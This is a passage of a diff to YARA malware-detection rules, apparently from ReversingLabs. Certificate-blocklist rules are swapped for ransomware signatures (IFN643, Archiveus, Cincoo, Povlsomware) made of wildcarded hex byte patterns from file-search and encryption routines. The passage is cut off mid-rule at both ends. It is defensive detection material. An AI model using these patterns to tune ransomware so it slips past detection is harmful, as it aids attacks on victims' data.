75 ?? 8B C6 8B 55 ?? 2B C2 83 F8 ?? 72 ?? 83 FE ?? 8D 45 ?? 8D 4A ?? BB ?? ?? + ?? ?? 0F 43 45 ?? 89 4D ?? 66 89 1C 50 33 D2 66 89 14 48 EB ?? 6A ?? 68 ?? ?? ?? ?? + C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? + ?? 8D 51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 8B 5D ?? 2B CA 8B 55 ?? 8B C3 D1 F9 2B + C2 3B C8 77 ?? 83 FB ?? 8D 04 09 50 8D 75 ?? 0F 43 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 3C + 0A 89 7D ?? 8D 04 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 04 7E EB ?? 51 8D 85 ?? + ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 81 BD + ?? ?? ?? ?? ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? 0F 43 45 ?? 68 + ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F + 84 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B F2 85 F6 74 + } + $encrypt_files_p2 = { + 6A ?? 8D 45 ?? 50 A1 ?? ?? ?? ?? 2B C6 56 03 C1 50 57 FF 15 ?? ?? ?? ?? 2B 75 ?? 74 + ?? 8B 8D ?? ?? ?? ?? EB ?? 57 FF 15 ?? ?? ?? ?? C6 45 ?? ?? 33 C0 8B 9D ?? ?? ?? ?? + BA ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 CB ?? 8B 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + 89 95 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8D 48 ?? 3B CA 76 ?? C6 85 ?? ?? ?? ?? ?? FF B5 + ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 95 ?? ?? ?? ?? C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 0F 43 4D ?? 3B C2 77 ?? 8D 34 00 89 85 ?? + ?? ?? ?? 83 FA ?? 8D BD ?? ?? ?? ?? 56 0F 43 BD ?? ?? ?? ?? 51 57 E8 ?? ?? ?? ?? 83 + C4 ?? 33 C0 66 89 04 37 EB ?? 50 51 C6 85 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? FF B5 ?? + ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C2 8B 8D ?? ?? ?? ?? 2B C1 83 F8 ?? + 72 ?? 83 FA ?? 8D B5 ?? ?? ?? ?? 6A ?? 0F 43 B5 ?? ?? ?? ?? 8D 79 ?? 68 ?? ?? ?? ?? + 89 BD ?? ?? ?? ?? 8D 04 4E 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 04 7E EB ?? 6A ?? + 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? + ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 8D ?? ?? ?? ?? 83 7D + ?? ?? 51 0F 43 45 ?? 50 FF 15 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "3 AM CHP" and pe.signatures[i].serial=="6e:32:53:1a:e8:39:92:f0:57:31:20:a5:e7:8d:e2:71" and 1451606399<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_6967A89Bcf6Efef160Aaeebbff376C0A : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_IFN643 : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects IFN643 ransomware." author = "ReversingLabs" - id = "d6714f50-600b-5437-8be6-097f7dd93dc7" - date = "2023-11-08" - modified = "2023-11-08" + id = "a4d211a7-6735-541e-885d-555bbc11e2cf" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1870-L1886" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "deb7465e453aa5838f81e15e270abc958a65e1a6051a88a5910244edbe874451" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.IFN643.yara#L1-L90" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ced234018f1f05601dd3be55eaecd2a1e116ad0b7bb9e0292434f11f19916ebe" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "IFN643" + tc_detection_factor = 5 importance = 25 + strings: + $search_files_1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 89 B5 ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8B D6 C7 45 ?? ?? ?? + ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? + ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 + ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? + 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 8D 8D ?? + ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB + ?? 0F 84 + } + $search_files_2 = { + 80 BD ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 75 ?? 33 + C0 EB ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 50 8D 85 ?? ?? ?? ?? + 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? + ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 + ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D6 8D 8D ?? ?? ?? ?? E8 ?? ?? + ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B D0 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 + ?? 8B C8 C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? + ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 0D ?? ?? ?? ?? F7 + E9 C1 FA ?? 8B C2 C1 E8 ?? 03 C2 83 F8 ?? 0F 83 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 85 C0 0F 8E ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D6 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8D 4D ?? C6 45 ?? ?? 51 8B D0 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8B 85 ?? + ?? ?? ?? 83 F8 ?? 72 ?? 8B 8D ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? + ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? + 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? + 8B 35 ?? ?? ?? ?? 33 DB 2B CE C7 85 ?? ?? ?? ?? ?? ?? ?? ?? F7 E9 C7 85 ?? ?? ?? ?? + ?? ?? ?? ?? C1 FA ?? 8B C2 C6 85 ?? ?? ?? ?? ?? C1 E8 ?? 03 C2 74 ?? 33 FF ?? ?? ?? + 8D 45 ?? 8D 0C 37 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 83 7D ?? ?? 89 45 ?? 8D 45 ?? 0F 43 + 45 ?? C6 00 ?? 8B 35 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B CE 43 F7 E9 83 + C7 ?? C1 FA ?? 8B C2 C1 E8 ?? 03 C2 3B D8 72 ?? 83 7D ?? ?? 76 ?? 8D 45 ?? B9 ?? ?? + ?? ?? 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 0D ?? ?? ?? ?? F7 E9 C1 + FA ?? 8B C2 C1 E8 ?? 03 C2 83 F8 ?? 0F 83 ?? ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? + 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F + 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 + E8 ?? ?? ?? ?? 83 C4 ?? 8B 9D ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? + ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 + F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? + 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B + 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? + 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 + ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? C6 45 ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 + ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 + ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? + 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 74 ?? E8 ?? ?? ?? ?? 8B 41 + ?? 3B C1 72 ?? E8 ?? ?? ?? ?? 2B C8 83 F9 ?? 73 ?? E8 ?? ?? ?? ?? 83 F9 ?? 76 ?? E8 + ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E + 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $encrypt_files = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ?? + 33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 65 ?? 8B C2 89 45 ?? 8B F9 8B 75 ?? 89 75 ?? + C7 45 ?? ?? ?? ?? ?? 90 3B F8 0F 84 ?? ?? ?? ?? 89 75 ?? C6 45 ?? ?? 85 F6 74 ?? 8B + 17 C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 83 7E ?? ?? C7 46 + ?? ?? ?? ?? ?? 72 ?? 8B 06 EB ?? 8B C6 C6 00 ?? 80 3A ?? 75 ?? 33 C0 EB ?? 8B C2 8D + 58 ?? 66 90 8A 08 40 84 C9 75 ?? 2B C3 50 52 8B CE E8 ?? ?? ?? ?? 8B 45 ?? 83 C6 ?? + C6 45 ?? ?? 89 75 ?? 83 C7 ?? EB ?? 8B 55 ?? 51 8B 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A + ?? 6A ?? E8 ?? ?? ?? ?? 8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C3 + 2B 49 ?? E9 ?? ?? ?? ?? 2B 49 ?? E9 ?? ?? ?? ?? 2B 49 ?? E9 ?? ?? ?? ?? 2B 49 ?? E9 + ?? ?? ?? ?? 33 C0 57 8B F9 40 F0 0F C1 05 ?? ?? ?? ?? 75 ?? 56 BE ?? ?? ?? ?? 56 E8 + ?? ?? ?? ?? 83 C6 ?? 59 81 FE ?? ?? ?? ?? 7C ?? 5E 8B C7 5F C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Chang Yucheng" and pe.signatures[i].serial=="69:67:a8:9b:cf:6e:fe:f1:60:aa:ee:bb:ff:37:6c:0a" and 1451174399<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and $search_files_1 and $search_files_2 and $encrypt_files } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7473D95405D2B0B3A8F28785Ce6E74Ca : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Archiveus : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Archiveus ransomware." author = "ReversingLabs" - id = "7f44b9d8-917b-5fc4-9651-cce89358e415" - date = "2023-11-08" - modified = "2023-11-08" + id = "89e5af93-1153-5367-a539-6af77c99c214" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1888-L1904" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e15b990b13617017ca2d1f8caf03d8ff3785ca9b860bf11f81af5dadf17a9be5" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Archiveus.yara#L3-L50" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2b8a42b98ab3e8b97d2e226e979f342a6a72f21d8f068f59c21ad95764077f8a" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Archiveus" + tc_detection_factor = 5 importance = 25 + strings: + $entry_point = { + 68 ?? ?? 40 00 E8 ?? ?? ?? FF + } + $dump_instruction = { + 8B 3D ?? ?? ?? ?? 6A ?? FF D7 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 + 74 ?? 8B 46 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 8D 4D ?? FF 15 ?? ?? ?? ?? + 50 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A + ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF D7 FF 15 ?? ?? ?? ?? E9 ?? ?? + ?? ?? 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 8D 55 ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? + ?? ?? 6A ?? 6A ?? 6A ?? 8D 45 ?? 68 ?? ?? ?? ?? 8D 4D ?? 50 51 FF D3 50 8D 55 ?? 8D + 45 ?? 52 50 FF D3 50 FF 15 + } + $extension_rule = { + 8B 13 6A ?? 68 ?? ?? ?? ?? 52 50 FF 15 ?? ?? ?? ?? D9 85 ?? ?? ?? ?? DB 85 ?? ?? ?? + ?? DD 9D ?? ?? ?? ?? DC 8D ?? ?? ?? ?? DF E0 A8 ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? + ?? DC 05 ?? ?? ?? ?? DF E0 A8 ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 4D ?? 89 45 + ?? FF 15 ?? ?? ?? ?? 8B 46 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 8D 4D ?? FF + 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D0 8D 4D ?? FF 15 ?? ?? ?? ?? + 50 6A ?? 6A ?? 6A ?? FF 15 + } + $instruction_string = "INSTRUCTIONS HOW TO GET YOUR FILES BACK.txt" wide + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Dmitrij Emelyanov" and pe.signatures[i].serial=="74:73:d9:54:05:d2:b0:b3:a8:f2:87:85:ce:6e:74:ca" and 1453939199<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($entry_point at pe.entry_point) and $dump_instruction and $extension_rule and $instruction_string } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_04F380F97579F1702A85E0169Bbdfd78 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Cincoo : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Cincoo ransomware." author = "ReversingLabs" - id = "860027ff-2df2-5519-afde-60ebee270290" - date = "2023-11-08" - modified = "2023-11-08" + id = "c7c2773c-5056-5127-8af7-7f5c5a8ea8a1" + date = "2022-06-21" + modified = "2022-06-21" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1906-L1922" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "73dc6e36fdaf5c80b33f20f2a9157805ce1d0218f3898104de16522ee9cfd51b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Cincoo.yara#L1-L78" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6a7562cae90754ea75a9fb98ce73ebdb9acf1ad7f28f2240abe6cb592d717ca3" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Cincoo" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ?? + 33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 55 ?? 8B D9 83 7B ?? ?? 8B F3 8B 45 ?? 8B 7D + ?? 89 45 ?? 72 ?? 8B 33 8D 4E ?? 66 8B 06 83 C6 ?? 66 85 C0 75 ?? 2B F1 D1 FE 0F 84 + ?? ?? ?? ?? 3B 73 ?? 0F 85 ?? ?? ?? ?? 88 45 ?? 8D 55 ?? FF 75 ?? 8D 4D ?? C7 45 ?? + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? C7 45 ?? ?? ?? ?? + ?? 50 8B CB E8 ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B + C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? + ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7B ?? ?? 72 ?? 8B 1B 8B 75 ?? 57 56 53 E8 ?? ?? + ?? ?? 85 C0 75 ?? 8B 36 8B CF E8 ?? ?? ?? ?? 84 C0 74 ?? 57 56 E8 ?? ?? ?? ?? 85 C0 + 75 ?? 8B CF E8 ?? ?? ?? ?? 84 C0 75 ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E + 5B 8B E5 5D C3 + } + $encrypt_files = { + 55 8B EC 83 EC ?? 8B 45 ?? 53 8B D9 89 45 ?? B9 ?? ?? ?? ?? 8B C1 56 8B 53 ?? 2B C2 + 8B 75 ?? 89 55 ?? 57 3B C6 0F 82 ?? ?? ?? ?? 8B 7B ?? 8D 04 32 8B F0 89 45 ?? 83 CE + ?? 89 7D ?? 3B F1 76 ?? 8B F1 EB ?? 8B C7 D1 E8 2B C8 3B F9 76 ?? BE ?? ?? ?? ?? EB + ?? 03 C7 3B F0 0F 42 F0 33 C9 8B C6 83 C0 ?? 0F 92 C1 F7 D9 0B C8 81 F9 ?? ?? ?? ?? + 72 ?? 8D 41 ?? 3B C1 0F 86 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? + ?? ?? 8B 55 ?? 8D 78 ?? 83 E7 ?? 89 47 ?? EB ?? 85 C9 74 ?? 51 E8 ?? ?? ?? ?? 8B 55 + ?? 83 C4 ?? 8B F8 EB ?? 33 FF 8B 45 ?? 89 43 ?? 8B 45 ?? 89 73 ?? 8D 34 3A 03 C6 83 + 7D ?? ?? 89 45 ?? 52 72 ?? 8B 33 56 57 E8 ?? ?? ?? ?? FF 75 ?? 8B 45 ?? FF 75 ?? 03 + C7 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 4D ?? 41 C6 00 ?? 81 F9 ?? ?? ?? ?? 72 ?? + 8B 56 ?? 83 C1 ?? 2B F2 8D 46 ?? 83 F8 ?? 77 ?? 8B F2 51 56 E8 ?? ?? ?? ?? 83 C4 ?? + 89 3B 8B C3 5F 5E 5B 8B E5 5D C2 ?? ?? 53 57 E8 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 56 E8 + ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? C6 00 ?? 8B C3 89 3B 5F 5E 5B 8B E5 5D C2 ?? ?? E8 ?? + ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC CC CC 56 8B F1 FF 76 ?? E8 ?? ?? ?? ?? 8B + 4E ?? 83 F9 ?? 72 ?? 8B 06 8D 0C 4D ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 + C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 77 ?? 8B C2 51 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? + ?? ?? ?? 33 C0 C7 46 ?? ?? ?? ?? ?? 66 89 06 5E C3 E8 ?? ?? ?? ?? CC CC CC CC CC CC + 8B 09 85 C9 74 ?? 8B 01 6A ?? FF 10 C3 + } + $drop_ransom_note = { + 52 51 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? 8D 4D ?? C6 46 ?? ?? + E8 ?? ?? ?? ?? 8B 45 ?? E9 ?? ?? ?? ?? 8B CE C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 8D + 4E ?? 50 E8 ?? ?? ?? ?? 81 CF ?? ?? ?? ?? 89 BD ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? + ?? ?? 8B C2 8B 8D ?? ?? ?? ?? 2B C1 89 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 83 F8 ?? + 72 ?? 83 FA ?? 8D B5 ?? ?? ?? ?? 8D 41 ?? 0F 43 B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D + 04 0E 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? C6 44 30 ?? ?? 8D 85 ?? ?? ?? ?? + EB + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "GRANIFLOR" and pe.signatures[i].serial=="04:f3:80:f9:75:79:f1:70:2a:85:e0:16:9b:bd:fd:78" and 1454889599<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ($drop_ransom_note) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_04D6B8Cc6Dce353Fcf3Ae8A532Be7255 : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Povlsomware : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Povlsomware ransomware." author = "ReversingLabs" - id = "937dd780-52f7-5f27-ac2e-a0245997d449" - date = "2023-11-08" - modified = "2023-11-08" + id = "317d7cca-4fe8-55ab-8f5f-e42be727ec26" + date = "2021-08-12" + modified = "2021-08-12" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1924-L1940" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a316ad7f554428d02a850fb3bb04f349d30ecd2ccd4597e7a63461bf5e866e6f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.Povlsomware.yara#L1-L64" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "465dc1b1d7e9eb3091f36efb51029cd3383d05ece054e814b18f379e58c7e457" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Povlsomware" + tc_detection_factor = 5 importance = 25 + strings: + $setup_attack = { + 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? + ?? ?? 73 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 2C ?? + 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 8E 69 80 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? 